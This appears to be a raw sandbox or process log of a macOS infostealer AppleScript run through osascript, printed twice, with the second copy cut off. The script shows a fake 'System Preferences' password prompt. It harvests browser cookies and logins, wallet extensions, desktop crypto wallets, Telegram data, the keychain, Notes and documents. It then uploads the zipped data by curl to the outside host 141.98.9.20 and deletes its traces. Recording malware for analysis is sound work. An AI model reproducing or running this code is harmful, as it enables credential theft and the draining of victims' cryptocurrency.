\"omaabbefbmiijedngplfjmnooppbclkk\", \"cjelfplplebdjjenllpjcblmjkfcffne\", \"jnlgamecbpmbajjfhmmmlhejkemejdma\", \"fpkhgmpbidmiogeglndfbkegfdlnajnf\", \"bifidjkcdpgfnlbcjpdkdcnbiooooblg\", \"amkmjjmmflddogmhpjloimipbofnfjih\", \"flpiciilemghbmfalicajoolhkkenfel\", \"hcflpincpppdclinealmandijcmnkbgn\", \"aeachknmefphepccionboohckonoeemg\", \"nlobpakggmbcgdbpjpnagmdbdhdhgphk\", \"momakdpclmaphlamgjcndbgfckjfpemp\", \"mnfifefkajgofkcjkemidiaecocnkjeh\", \"fnnegphlobjdpkhecapkijjdkgcjhkib\", \"ehjiblpccbknkgimiflboggcffmpphhp\", \"ilhaljfiglknggcoegeknjghdgampffk\", \"pgiaagfkgcbnmiiolekcfmljdagdhlcm\", \"fnjhmkhhmkbjkkabndcnnogagogbneec\", \"bfnaelmomeimhlpmgjnjophhpkkoljpa\", \"imlcamfeniaidioeflifonfjeeppblda\", \"mdjmfdffdcmnoblignmgpommbefadffd\", \"ooiepdgjjnhcmlaobfinbomgebfgablh\", \"pcndjhkinnkaohffealmlmhaepkpmgkb\", \"ppdadbejkmjnefldpcdjhnkpbjkikoip\", \"cgeeodpfagjceefieflmdfphplkenlfk\", \"dlcobpjiigpikoobohmabehhmhfoodbb\", \"jiidiaalihmmhddjgbnbgdfflelocpak\", \"bocpokimicclpaiekenaeelehdjllofo\", \"pocmplpaccanhmnllbbkpgfliimjljgo\", \"cphhlgmgameodnhkjdmkpanlelnlohao\", \"mcohilncbfahbmgdjkbpemcciiolgcge\", \"bopcbmipnjdcdfflfgjdgdjejmgpoaab\", \"khpkpbbcccdmmclmpigdgddabeilkdpd\", \"ejjladinnckdgjemekebdpeokbikhfci\", \"phkbamefinggmakgklpkljjmgibohnba\", \"epapihdplajcdnnkdeiahlgigofloibg\", \"hpclkefagolihohboafpheddmmgdffjm\", \"cjookpbkjnpkmknedggeecikaponcalb\", \"cpmkedoipcpimgecpmgpldfpohjplkpp\", \"modjfdjcodmehnpccdjngmdfajggaoeh\", \"ibnejdfjmmkpcnlpebklmnkoeoihofec\", \"afbcbjpbpfadlkmhmclhkeeodmamcflc\", \"kncchdigobghenbbaddojjnnaogfppfj\", \"efbglgofoippbgcjepnhiblaibcnclgk\", \"mcbigmjiafegjnnogedioegffbooigli\", \"fccgmnglbhajioalokbcidhcaikhlcpm\", \"hnhobjmcibchnmglfbldbfabcgaknlkj\", \"apnehcjmnengpnmccpaibjmhhoadaico\", \"enabgbdfcbaehmbigakijjabdpdnimlg\", \"mgffkfbidihjpoaomajlbgchddlicgpn\", \"fopmedgnkfpebgllppeddmmochcookhc\", \"jojhfeoedkpkglbfimdfabpdfjaoolaf\", \"ammjlinfekkoockogfhdkgcohjlbhmff\", \"abkahkcbhngaebpcgfmhkoioedceoigp\", \"dcbjpgbkjoomeenajdabiicabjljlnfp\", \"gkeelndblnomfmjnophbhfhcjbcnemka\", \"pnndplcbkakcplkjnolgbkdgjikjednm\", \"copjnifcecdedocejpaapepagaodgpbh\", \"hgbeiipamcgbdjhfflifkgehomnmglgk\", \"mkchoaaiifodcflmbaphdgeidocajadp\", \"ellkdbaphhldpeajbepobaecooaoafpg\", \"mdnaglckomeedfbogeajfajofmfgpoae\", \"nknhiehlklippafakaeklbeglecifhad\", \"ckklhkaabbmdjkahiaaplikpdddkenic\", \"fmblappgoiilbgafhjklehhfifbdocee\", \"nphplpgoakhhjchkkhmiggakijnkhfnd\", \"cnmamaachppnkjgnildpdmkaakejnhae\", \"fijngjgcjhjmmpcmkeiomlglpeiijkld\", \"niiaamnmgebpeejeemoifgdndgeaekhe\", \"odpnjmimokcmjgojhnhfcnalnegdjmdn\", \"lbjapbcmmceacocpimbpbidpgmlmoaao\", \"hnfanknocfeofbddgcijnmhnfnkdnaad\", \"hpglfhgfnhbgpjdenjgmdgoeiappafln\", \"egjidjbpglichdcondbcbdnbeeppgdph\", \"ibljocddagjghmlpgihahamcghfggcjc\", \"gkodhkbmiflnmkipcmlhhgadebbeijhh\", \"dbgnhckhnppddckangcjbkjnlddbjkna\", \"mfhbebgoclkghebffdldpobeajmbecfk\", \"nlbmnnijcnlegkjjpcfjclmcfggfefdm\", \"nlgbhdfgdhgbiamfdfmbikcdghidoadd\", \"acmacodkjbdgmoleebolmdjonilkdbch\", \"agoakfejjabomempkjlepdflaleeobhb\", \"dgiehkgfknklegdhekgeabnhgfjhbajd\", \"onhogfjeacnfoofkfgppdlbmlmnplgbn\", \"kkpehldckknjffeakihjajcjccmcjflh\", \"jaooiolkmfcmloonphpiiogkfckgciom\", \"ojggmchlghnjlapmfbnjholfjkiidbch\", \"pmmnimefaichbcnbndcfpaagbepnjaig\", \"oiohdnannmknmdlddkdejbmplhbdcbee\", \"aiifbnbfobpmeekipheeijimdpnlpgpp\", \"aholpfdialjgjfhomihkjbmgjidlcdno\", \"anokgmphncpekkhclmingpimjmcooifb\", \"kkpllkodjeloidieedojogacfhpaihoh\", \"iokeahhehimjnekafflcihljlcjccdbe\", \"ifckdpamphokdglkkdomedpdegcjhjdp\", \"loinekcabhlmhjjbocijdoimmejangoa\", \"fcfcfllfndlomdhbehjjcoimbgofdncg\", \"ifclboecfhkjbpmhgehodcjpciihhmif\", \"dmkamcknogkgcdfhhbddcghachkejeap\", \"ookjlbkiijinhpmnjffcofjonbfbgaoc\", \"oafedfoadhdjjcipmcbecikgokpaphjk\", \"mapbhaebnddapnmifbbkgeedkeplgjmf\", \"cmndjbecilbocjfkibfbifhngkdmjgog\", \"kpfopkelmapcoipemfendmdcghnegimn\", \"lgmpcpglpngdoalbgeoldeajfclnhafa\", \"ppbibelpcjmhbdihakflkdcoccbgbkpo\", \"ffnbelfdoeiohenkjibnmadjiehjhajb\", \"opcgpfmipidbgpenhmajoajpbobppdil\", \"lakggbcodlaclcbbbepmkpdhbcomcgkd\", \"kgdijkcfiglijhaglibaidbipiejjfdp\", \"hdkobeeifhdplocklknbnejdelgagbao\", \"lnnnmfcpbkafcpgdilckhmhbkkbpkmid\", \"nbdhibgjnjpnkajaghbffjbkcgljfgdi\", \"kmhcihpebfmpgmihbkipmjlmmioameka\", \"kmphdnilpmdejikjdnlbcnmnabepfgkh\", \"nngceckbapebfimnlniiiahkandclblb\"} set chromiumFiles to {\"/Network/Cookies\", \"/Cookies\", \"/Web Data\", \"/Login Data\", \"/Local Extension Settings/\", \"/IndexedDB/\"} repeat with chromium in chromium_map set savePath to writemind & \"Chromium/\" & item 1 of chromium & \"_\" try set fileList to list folder item 2 of chromium without invisibles repeat with currentItem in fileList if ((currentItem as string) is equal to \"Default\") or ((currentItem as string) contains \"Profile\") then repeat with CFile in chromiumFiles set readpath to (item 2 of chromium & currentItem & CFile) if ((CFile as string) is equal to \"/Network/Cookies\") then set CFile to \"/Cookies\" end if if ((CFile as string) is equal to \"/Local Extension Settings/\") then grabPlugins(readpath, savePath & currentItem, pluginList, false) else if (CFile as string) is equal to \"/IndexedDB/\" then grabPlugins(readpath, savePath & currentItem, pluginList, true) else set writepath to savePath & currentItem & CFile readwrite(readpath, writepath) end if end repeat end if end repeat end try end repeat end chromium on telegram(writemind, library) try GrabFolder(library & \"Telegram Desktop/tdata/\", writemind & \"Telegram Data/\") end try end telegram on deskwallets(writemind, deskwals) repeat with deskwal in deskwals try GrabFolder(item 2 of deskwal, writemind & item 1 of deskwal) end try end repeat end deskwallets on filegrabber(writemind) try set destinationFolderPath to POSIX file (writemind & \"FileGrabber/\") mkdir(destinationFolderPath) set photosPath to POSIX file (writemind & \"FileGrabber/NotesFiles/\") mkdir(photosPath) set extensionsList to {\"txt\", \"pdf\", \"docx\", \"wallet\", \"key\", \"keys\", \"doc\"} set bankSize to 0 tell application \"Finder\" try set safariFolderPath to (path to home folder as text) & \"Library:Cookies:\" duplicate file (safariFolderPath & \"Cookies.binarycookies\") to folder destinationFolderPath with replacing set name of result to \"saf1\" end try try set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group Containers:group.com.apple.notes:\" set notesAccounts to folder (notesFolderPath & \"Accounts:LocalAccount:Media\") duplicate notesAccounts to photosPath with replacing duplicate notesAccounts to POSIX file photosPath as alias with replacing set notesFolder to folder notesFolderPath set notesFiles to {\"NoteStore.sqlite\", \"NoteStore.sqlite-shm\", \"NoteStore.sqlite-wal\"} repeat with fileName in notesFiles set sourceFile to file fileName of notesFolder duplicate sourceFile to POSIX file destinationFolderPath as alias with replacing end repeat end try try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) set downloadsFiles to every file of folder \"Downloads\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles & downloadsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set filesize to size of aFile if filesize < 3 * 1024 * 1024 then if (bankSize + filesize) < 30 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + filesize end try else exit repeat end if end if end if end repeat end try end tell end try end filegrabber on send_data(attempt) try set result_send to (do shell script \"curl -X POST -H \\\"user: U86a4irDPnx0tAJz7TLOjLJYmAQVbgSjU5qs/B5Ew50=\\\" -H \\\"BuildID: xfSjtQhSzYb0Vrl3d-Yt-dadILWIh9rw4YAjC3vFKmI=\\\" -H \\\"cl: 0\\\" -H \\\"cn: 0\\\" --max-time 300 -retry 5 -retry-delay 10 -F \\\"file=@/tmp/out.zip\\\" http://141.98.9.20/joinsystem\") on error if attempt < 40 then delay 3 send_data(attempt + 1) end if end try end send_data set username to (system attribute \"USER\") set profile to \"/Users/\" & username set randomNumber to do shell script \"echo \$((RANDOM % 9000 + 1000))\" set writemind to \"/tmp/\" & randomNumber & \"/\" try set result to (do shell script \"system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType\") writeText(result, writemind & \"info\") end try set library to profile & \"/Library/Application Support/\" set password_entered to getpwd(username, writemind) delay 0.01 set chromiumMap to {{\"Chrome\", library & \"Google/Chrome/\"}, {\"Brave\", library & \"BraveSoftware/Brave-Browser/\"}, {\"Edge\", library & \"Microsoft Edge/\"}, {\"Vivaldi\", library & \"Vivaldi/\"}, {\"Opera\", library & \"com.operasoftware.Opera/\"}, {\"OperaGX\", library & \"com.operasoftware.OperaGX/\"}, {\"Chrome Beta\", library & \"Google/Chrome Beta/\"}, {\"Chrome Canary\", library & \"Google/Chrome Canary\"}, {\"Chromium\", library & \"Chromium/\"}, {\"Chrome Dev\", library & \"Google/Chrome Dev/\"}, {\"Arc\", library & \"Arc/\"}, {\"Coccoc\", library & \"Coccoc/\"}} set walletMap to {{\"deskwallets/Electrum\", profile & \"/.electrum/wallets/\"}, {\"deskwallets/Coinomi\", library & \"Coinomi/wallets/\"}, {\"deskwallets/Exodus\", library & \"Exodus/\"}, {\"deskwallets/Atomic\", library & \"atomic/Local Storage/leveldb/\"}, {\"deskwallets/Wasabi\", profile & \"/.walletwasabi/client/Wallets/\"}, {\"deskwallets/Ledger_Live\", library & \"Ledger Live/\"}, {\"deskwallets/Monero\", profile & \"/Monero/wallets/\"}, {\"deskwallets/Bitcoin_Core\", library & \"Bitcoin/wallets/\"}, {\"deskwallets/Litecoin_Core\", library & \"Litecoin/wallets/\"}, {\"deskwallets/Dash_Core\", library & \"DashCore/wallets/\"}, {\"deskwallets/Electrum_LTC\", profile & \"/.electrum-ltc/wallets/\"}, {\"deskwallets/Electron_Cash\", profile & \"/.electron-cash/wallets/\"}, {\"deskwallets/Guarda\", library & \"Guarda/\"}, {\"deskwallets/Dogecoin_Core\", library & \"Dogecoin/wallets/\"}, {\"deskwallets/Trezor_Suite\", library & \"@trezor/suite-desktop/\"}} readwrite(library & \"Binance/app-store.json\", writemind & \"deskwallets/Binance/app-store.json\") readwrite(library & \"@tonkeeper/desktop/config.json\", \"deskwallets/TonKeeper/config.json\") readwrite(profile & \"/Library/Keychains/login.keychain-db\", writemind & \"keychain\") if release then readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\", writemind & \"FileGrabber/NoteStore.sqlite\") readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal\", writemind & \"FileGrabber/NoteStore.sqlite-wal\") readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm\", writemind & \"FileGrabber/NoteStore.sqlite-shm\") readwrite2(profile & \"/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/Cookies.binarycookies\") readwrite(profile & \"/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/saf1\") end if if filegrabbers then filegrabber(writemind) end if writeText(username, writemind & \"username\") set ff_paths to {library & \"Firefox/Profiles/\", library & \"Waterfox/Profiles/\", library & \"Pale Moon/Profiles/\"} repeat with firefox in ff_paths try parseFF(firefox, writemind) end try end repeat chromium(writemind, chromiumMap) deskwallets(writemind, walletMap) telegram(writemind, library) do shell script \"ditto -c -k --sequesterRsrc \" & writemind & \" /tmp/out.zip\" send_data(0) do shell script \"rm -r \" & writemind do shell script \"rm /tmp/out.zip\" '&"
1⤵
PID:528
- /usr/bin/osascript
  osascript -e "set release to true set filegrabbers to true if release then try tell window 1 of application \"Terminal\" to set visible to false end try end if on filesizer(paths) set fsz to 0 try set theItem to quoted form of POSIX path of paths set fsz to (do shell script \"/usr/bin/mdls -name kMDItemFSSize -raw \" & theItem) end try return fsz end filesizer on mkdir(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) do shell script \"mkdir -p \" & filePosixPath end try end mkdir on FileName(filePath) try set reversedPath to (reverse of every character of filePath) as string set trimmedPath to text 1 thru ((offset of \"/\" in reversedPath) - 1) of reversedPath set finalPath to (reverse of every character of trimmedPath) as string return finalPath end try end FileName on BeforeFileName(filePath) try set lastSlash to offset of \"/\" in (reverse of every character of filePath) as string set trimmedPath to text 1 thru -(lastSlash + 1) of filePath return trimmedPath end try end BeforeFileName on writeText(textToWrite, filePath) try set folderPath to BeforeFileName(filePath) mkdir(folderPath) set fileRef to (open for access filePath with write permission) write textToWrite to fileRef starting at eof close access fileRef end try end writeText on readwrite(path_to_file, path_as_save) try set fileContent to read path_to_file set folderPath to BeforeFileName(path_as_save) mkdir(folderPath) do shell script \"cat \" & quoted form of path_to_file & \" > \" & quoted form of path_as_save end try end readwrite on readwrite2(path_to_file, path_as_save) try set folderPath to do shell script \"dirname \" & quoted form of path_as_save mkdir(folderPath) tell application \"Finder\" set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacing end tell end try end readwrite2 on isDirectory(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) set fileType to (do shell script \"file -b \" & filePosixPath) if fileType ends with \"directory\" then return true end if return false end try end isDirectory on GrabFolderLimit(sourceFolder, destinationFolder) try set bankSize to 0 set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolderLimit(itemPath, savePath) else set fsz to filesizer(itemPath) set bankSize to bankSize + fsz if bankSize < 10 * 1024 * 1024 then readwrite(itemPath, savePath) end if end if end if end repeat end try end GrabFolderLimit on GrabFolder(sourceFolder, destinationFolder) try set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\", \"dumps\", \"emoji\", \"user_data\", \"__update__\", \"user_data#2\", \"user_data#3\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolder(itemPath, savePath) else readwrite(itemPath, savePath) end if end if end repeat end try end GrabFolder on parseFF(firefox, writemind) try set myFiles to {\"/cookies.sqlite\", \"/formhistory.sqlite\", \"/key4.db\", \"/logins.json\"} set fileList to list folder firefox without invisibles repeat with currentItem in fileList set fpath to writemind & \"ff/\" & currentItem set readpath to firefox & currentItem repeat with FFile in myFiles readwrite(readpath & FFile, fpath & FFile) end repeat end repeat end try end parseFF on checkvalid(username, password_entered) try set result to do shell script \"dscl . authonly \" & quoted form of username & space & quoted form of password_entered if result is not equal to \"\" then return false else return true end if on error return false end try end checkvalid on getpwd(username, writemind) try if checkvalid(username, \"\") then set result to do shell script \"security 2>&1 > /dev/null find-generic-password -ga \\\"Chrome\\\" | awk \\\"{print \$2}\\\"\" writeText(result as string, writemind & \"masterpass-chrome\") else repeat set result to display dialog \"Required Application Helper.\\nPlease enter password for continue.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"System Preferences\" with hidden answer set password_entered to text returned of result if checkvalid(username, password_entered) then writeText(password_entered, writemind & \"pwd\") return password_entered end if end repeat end if end try return \"\" end getpwd on grabPlugins(paths, savePath, pluginList, index) try set fileList to list folder paths without invisibles repeat with PFile in fileList repeat with Plugin in pluginList if (PFile contains Plugin) then set newpath to paths & PFile set newsavepath to savePath & \"/\" & Plugin if index then set newsavepath to newsavepath & \"/IndexedDB/\" end if GrabFolder(newpath, newsavepath) end if end repeat end repeat end try end grabPlugins on chromium(writemind, chromium_map) set pluginList to {\"keenhcnmdmjjhincpilijphpiohdppno\", \"hbbgbephgojikajhfbomhlmmollphcad\", \"cjmkndjhnagcfbpiemnkdpomccnjblmj\", \"dhgnlgphgchebgoemcjekedjjbifijid\", \"hifafgmccdpekplomjjkcfgodnhcellj\", \"kamfleanhcmjelnhaeljonilnmjpkcjc\", \"jnldfbidonfeldmalbflbmlebbipcnle\", \"fdcnegogpncmfejlfnffnofpngdiejii\", \"klnaejjgbibmhlephnhpmaofohgkpgkd\", \"pdadjkfkgcafgbceimcpbkalnfnepbnk\", \"kjjebdkfeagdoogagbhepmbimaphnfln\", \"ldinpeekobnhjjdofggfgjlcehhmanlj\", \"dkdedlpgdmmkkfjabffeganieamfklkm\", \"bcopgchhojmggmffilplmbdicgaihlkp\", \"kpfchfdkjhcoekhdldggegebfakaaiog\", \"idnnbdplmphpflfnlkomgpfbpcgelopg\", \"mlhakagmgkmonhdonhkpjeebfphligng\", \"bipdhagncpgaccgdbddmbpcabgjikfkn\", \"gcbjmdjijjpffkpbgdkaojpmaninaion\", \"nhnkbkgjikgcigadomkphalanndcapjk\", \"bhhhlbepdkbapadjdnnojkbgioiodbic\", \"hoighigmnhgkkdaenafgnefkcmipfjon\", \"klghhnkeealcohjjanjjdaeeggmfmlpl\", \"nkbihfbeogaeaoehlefnkodbefgpgknn\", \"fhbohimaelbohpjbbldcngcnapndodjp\", \"ebfidpplhabeedpnhjnobghokpiioolj\", \"emeeapjkbcbpbpgaagfchmcgglmebnen\", \"fldfpgipfncgndfolcbkdeeknbbbnhcc\", \"penjlddjkjgpnkllboccdgccekpkcbin\", \"fhilaheimglignddkjgofkcbgekhenbh\", \"hmeobnfnfcmdkdcmlblgagmfpfboieaf\", \"cihmoadaighcejopammfbmddcmdekcje\", \"lodccjjbdhfakaekdiahmedfbieldgik\", \"omaabbefbmiijedngplfjmnooppbclkk\", \"cjelfplplebdjjenllpjcblmjkfcffne\", \"jnlgamecbpmbajjfhmmmlhejkemejdma\", \"fpkhgmpbidmiogeglndfbkegfdlnajnf\", \"bifidjkcdpgfnlbcjpdkdcnbiooooblg\", \"amkmjjmmflddogmhpjloimipbofnfjih\", \"flpiciilemghbmfalicajoolhkkenfel\", \"hcflpincpppdclinealmandijcmnkbgn\", \"aeachknmefphepccionboohckonoeemg\", \"nlobpakggmbcgdbpjpnagmdbdhdhgphk\", \"momakdpclmaphlamgjcndbgfckjfpemp\", \"mnfifefkajgofkcjkemidiaecocnkjeh\", \"fnnegphlobjdpkhecapkijjdkgcjhkib\", \"ehjiblpccbknkgimiflboggcffmpphhp\", \"ilhaljfiglknggcoegeknjghdgampffk\", \"pgiaagfkgcbnmiiolekcfmljdagdhlcm\", \"fnjhmkhhmkbjkkabndcnnogagogbneec\", \"bfnaelmomeimhlpmgjnjophhpkkoljpa\", \"imlcamfeniaidioeflifonfjeeppblda\", \"mdjmfdffdcmnoblignmgpommbefadffd\", \"ooiepdgjjnhcmlaobfinbomgebfgablh\", \"pcndjhkinnkaohffealmlmhaepkpmgkb\", \"ppdadbejkmjnefldpcdjhnkpbjkikoip\", \"cgeeodpfagjceefieflmdfphplkenlfk\", \"dlcobpjiigpikoobohmabehhmhfoodbb\", \"jiidiaalihmmhddjgbnbgdfflelocpak\", \"bocpokimicclpaiekenaeelehdjllofo\", \"pocmplpaccanhmnllbbkpgfliimjljgo\", \"cphhlgmgameodnhkjdmkpanlelnlohao\", \"mcohilncbfahbmgdjkbpemcciiolgcge\", \"bopcbmipnjdcdfflfgjdgdjejmgpoaab\", \"khpkpbbcccdmmclmpigdgddabeilkdpd\", \"ejjladinnckdgjemekebdpeokbikhfci\", \"phkbamefinggmakgklpkljjmgibohnba\", \"epapihdplajcdnnkdeiahlgigofloibg\", \"hpclkefagolihohboafpheddmmgdffjm\", \"cjookpbkjnpkmknedggeecikaponcalb\", \"cpmkedoipcpimgecpmgpldfpohjplkpp\", \"modjfdjcodmehnpccdjngmdfajggaoeh\", \"ibnejdfjmmkpcnlpebklmnkoeoihofec\", \"afbcbjpbpfadlkmhmclhkeeodmamcflc\", \"kncchdigobghenbbaddojjnnaogfppfj\", \"efbglgofoippbgcjepnhiblaibcnclgk\", \"mcbigmjiafegjnnogedioegffbooigli\", \"fccgmnglbhajioalokbcidhcaikhlcpm\", \"hnhobjmcibchnmglfbldbfabcgaknlkj\", \"apnehcjmnengpnmccpaibjmhhoadaico\", \"enabgbdfcbaehmbigakijjabdpdnimlg\", \"mgffkfbidihjpoaomajlbgchddlicgpn\", \"fopmedgnkfpebgllppeddmmochcookhc\", \"jojhfeoedkpkglbfimdfabpdfjaoolaf\", \"ammjlinfekkoockogfhdkgcohjlbhmff\", \"abkahkcbhngaebpcgfmhkoioedceoigp\", \"dcbjpgbkjoomeenajdabiicabjljlnfp\", \"gkeelndblnomfmjnophbhfhcjbcnemka\", \"pnndplcbkakcplkjnolgbkdgjikjednm\", \"copjnifcecdedocejpaapepagaodgpbh\", \"hgbeiipamcgbdjhfflifkgehomnmglgk\", \"mkchoaaiifodcflmbaphdgeidocajadp\", \"ellkdbaphhldpeajbepobaecooaoafpg\", \"mdnaglckomeedfbogeajfajofmfgpoae\", \"nknhiehlklippafakaeklbeglecifhad\", \"ckklhkaabbmdjkahiaaplikpdddkenic\", \"fmblappgoiilbgafhjklehhfifbdocee\", \"nphplpgoakhhjchkkhmiggakijnkhfnd\", \"cnmamaachppnkjgnildpdmkaakejnhae\", \"fijngjgcjhjmmpcmkeiomlglpeiijkld\", \"niiaamnmgebpeejeemoifgdndgeaekhe\", \"odpnjmimokcmjgojhnhfcnalnegdjmdn\", \"lbjapbcmmceacocpimbpbidpgmlmoaao\", \"hnfanknocfeofbddgcijnmhnfnkdnaad\", \"hpglfhgfnhbgpjdenjgmdgoeiappafln\", \"egjidjbpglichdcondbcbdnbeeppgdph\", \"ibljocddagjghmlpgihahamcghfggcjc\", \"gkodhkbmiflnmkipcmlhhgadebbeijhh\", \"dbgnhckhnppddckangcjbkjnlddbjkna\", \"mfhbebgoclkghebffdldpobeajmbecfk\", \"nlbmnnijcnlegkjjpcfjclmcfggfefdm\", \"nlgbhdfgdhgbiamfdfmbikcdghidoadd\", \"acmacodkjbdgmoleebolmdjonilkdbch\", \"agoakfejjabomempkjlepdflaleeobhb\", \"dgiehkgfknklegdhekgeabnhgfjhbajd\", \"onhogfjeacnfoofkfgppdlbmlmnplgbn\", \"kkpehldckknjffeakihjajcjccmcjflh\", \"jaooiolkmfcmloonphpiiogkfckgciom\", \"ojggmchlghnjlapmfbnjholfjkiidbch\", \"pmmnimefaichbcnbndcfpaagbepnjaig\", \"oiohdnannmknmdlddkdejbmplhbdcbee\", \"aiifbnbfobpmeekipheeijimdpnlpgpp\", \"aholpfdialjgjfhomihkjbmgjidlcdno\", \"anokgmphncpekkhclmingpimjmcooifb\", \"kkpllkodjeloidieedojogacfhpaihoh\", \"iokeahhehimjnekafflcihljlcjccdbe\", \"ifckdpamphokdglkkdomedpdegcjhjdp\", \"loinekcabhlmhjjbocijdoimmejangoa\", \"fcfcfllfndlomdhbehjjcoimbgofdncg\", \"ifclboecfhkjbpmhgehodcjpciihhmif\", \"dmkamcknogkgcdfhhbddcghachkejeap\", \"ookjlbkiijinhpmnjffcofjonbfbgaoc\", \"oafedfoadhdjjcipmcbecikgokpaphjk\", \"mapbhaebnddapnmifbbkgeedkeplgjmf\", \"cmndjbecilbocjfkibfbifhngkdmjgog\", \"kpfopkelmapcoipemfendmdcghnegimn\", \"lgmpcpglpngdoalbgeoldeajfclnhafa\", \"ppbibelpcjmhbdihakflkdcoccbgbkpo\", \"ffnbelfdoeiohenkjibnmadjiehjhajb\", \"opcgpfmipidbgpenhmajoajpbobppdil\", \"lakggbcodlaclcbbbepmkpdhbcomcgkd\", \"kgdijkcfiglijhaglibaidbipiejjfdp\", \"hdkobeeifhdplocklknbnejdelgagbao\", \"lnnnmfcpbkafcpgdilckhmhbkkbpkmid\", \"nbdhibgjnjpnkajaghbffjbkcgljfgdi\", \"kmhcihpebfmpgmihbkipmjlmmioameka\", \"kmphdnilpmdejikjdnlbcnmnabepfgkh\", \"nngceckbapebfimnlniiiahkandclblb\"} set chromiumFiles to {\"/Network/Cookies\", \"/Cookies\", \"/Web Data\", \"/Login Data\", \"/Local Extension Settings/\", \"/IndexedDB/\"} repeat with chromium in chromium_map set savePath to writemind & \"Chromium/\" & item 1 of chromium & \"_\" try set fileList to list folder item 2 of chromium without invisibles repeat with currentItem in fileList if ((currentItem as string) is equal to \"Default\") or ((currentItem as string) contains \"Profile\") then repeat with CFile in chromiumFiles set readpath to (item 2 of chromium & currentItem & CFile) if ((CFile as string) is equal to \"/Network/Cookies\") then set CFile to \"/Cookies\" end if if ((CFile as string) is equal to \"/Local Extension Settings/\") then grabPlugins(readpath, savePath & currentItem, pluginList, false) else if (CFile as string) is equal to \"/IndexedDB/\" then grabPlugins(readpath, savePath & currentItem, pluginList, true) else set writepath to savePath & currentItem & CFile readwrite(readpath, writepath) end if end repeat end if end repeat end try end repeat end chromium on telegram(writemind, library) try GrabFolder(library & \"Telegram Desktop/tdata/\", writemind & \"Telegram Data/\") end try end telegram on deskwallets(writemind, deskwals) repeat with deskwal in deskwals try GrabFolder(item 2 of deskwal, writemind & item 1 of deskwal) end try end repeat end deskwallets on filegrabber(writemind) try set destinationFolderPath to POSIX file (writemind & \"FileGrabber/\") mkdir(destinationFolderPath) set photosPath to POSIX file (writemind & \"FileGrabber/NotesFiles/\") mkdir(photosPath) set extensionsList to {\"txt\", \"pdf\", \"docx\", \"wallet\", \"key\", \"keys\", \"doc\"} set bankSize to 0 tell application \"Finder\" try set safariFolderPath to (path to home folder as text) & \"Library:Cookies:\" duplicate file (safariFolderPath & \"Cookies.binarycookies\") to folder destinationFolderPath with replacing set name of result to \"saf1\" end try try set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group Containers:group.com.apple.notes:\" set notesAccounts to folder (notesFolderPath & \"Accounts:LocalAccount:Media\") duplicate notesAccounts to photosPath with replacing duplicate notesAccounts to POSIX file photosPath as alias with replacing set notesFolder to folder notesFolderPath set notesFiles to {\"NoteStore.sqlite\", \"NoteStore.sqlite-shm\", \"NoteStore.sqlite-wal\"} repeat with fileName in notesFiles set sourceFile to file fileName of notesFolder duplicate sourceFile to POSIX file destinationFolderPath as alias with replacing end repeat end try try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) set downloadsFiles to every file of folder \"Downloads\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles & downloadsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set filesize to size of aFile if filesize < 3 * 1024 * 1024 then if (bankSize + filesize) < 30 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + filesize end try else exit repeat end if end if end if end repeat end try end tell end try end filegrabber on send_data(attempt) try set result_send to (do shell script \"curl -X POST -H \\\"user: U86a4irDPnx0tAJz7TLOjLJYmAQVbgSjU5qs/B5Ew50=\\\" -H \\\"BuildID: xfSjtQhSzYb0Vrl3d-Yt-dadILWIh9rw4YAjC3vFKmI=\\\" -H \\\"cl: 0\\\" -H \\\"cn: 0\\\" --max-time 300 -retry 5 -retry-delay 10 -F \\\"file=@/tmp/out.zip\\\" http://141.98.9.20/joinsystem\") on error if attempt < 40 then delay 3 send_data(attempt + 1) end if end try end send_data set username to (system attribute \"USER\") set profile to \"/Users/\" & username set randomNumber to do shell script \"echo \$((RANDOM % 9000 + 1000))\" set writemind to \"/tmp/\" & randomNumber & \"/\" try set result to (do shell script \"system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType\") writeText(result, writemind & \"info\") end try set library to profile & \"/Library/Application Support/\" set password_entered to getpwd(username, writemind) delay 0.01 set chromiumMap to {{\"Chrome\", library & \"Google/Chrome/\"}, 